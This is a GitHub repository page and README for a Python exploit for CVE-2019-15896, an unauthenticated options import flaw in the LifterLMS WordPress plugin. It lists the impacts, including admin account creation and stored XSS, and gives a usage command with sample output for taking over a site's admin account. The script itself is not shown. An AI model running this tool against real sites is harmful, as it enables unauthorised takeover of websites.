https://github.com/randomrobbiebf/cve-2019-15896
LifterLMS <= 3.34.5 - Unauthenticated Options Import
Last synced: 8 months ago
- Host: GitHub
- URL: https://github.com/randomrobbiebf/cve-2019-15896
- Owner: RandomRobbieBF
- License: gpl-3.0
- Created: 2023-08-22T18:56:09.000Z (almost 3 years ago)
- Default Branch: main
- Last Pushed: 2023-08-22T18:59:15.000Z (almost 3 years ago)
- Last Synced: 2025-09-22T14:02:23.959Z (9 months ago)
- Language: Python
- Size: 17.6 KB
- Stars: 0
- Watchers: 1
- Forks: 1
- Open Issues: 0
Metadata Files:
- Readme: README.md
- License: LICENSE
README
# CVE-2019-15896
LifterLMS <= 3.34.5 - Unauthenticated Options Import
# Description
Unauthenticated Options Import, which could lead to:
- Website Redirection
- Administrator Account Creation
- Content Injection
- Stored XSS
The issues have been reported as fixed in 3.35.0. However v3.35.1 added additional input sanitisation and filtering.
How to use
---
```
$ python3 CVE-2019-15896.py --url http://wordpress.lan --username radmin --email admin@admin.lan
LifterLMS <= 3.34.5 - Unauthenticated Options Import
Exploit By Ramdom Robbie
Once ran check your email for the forgotten password link.
Password reset email sent to admin@admin.lan
```
Info
---
```
Requires access to login.php and a working email address, and the site needs to be able to send emails.
```